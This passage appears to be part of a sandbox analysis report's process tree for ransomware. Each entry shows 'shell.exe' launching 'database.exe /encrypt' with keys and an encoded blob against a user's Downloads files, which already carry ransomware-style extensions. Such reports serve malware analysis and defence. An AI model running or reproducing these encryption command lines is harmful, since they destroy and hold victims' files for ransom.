                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ApproveLimit.ini.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\BackupUpdate.vst.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CloseNew.jpeg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CompleteGet.vstx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CompressSuspend.mp4v.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ConvertReset.pub.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ConvertToPop.xlt.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CopyStart.wmx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\DebugFormat.scf.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ExitGrant.php.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ExpandPush.wmf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\FindMerge.zip.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\GetDisable.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\InitializeShow.m4v.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\MergeConvertFrom.pptm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\OutDisable.wmv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\OutUnpublish.wmf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\PopConvert.txt.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4488
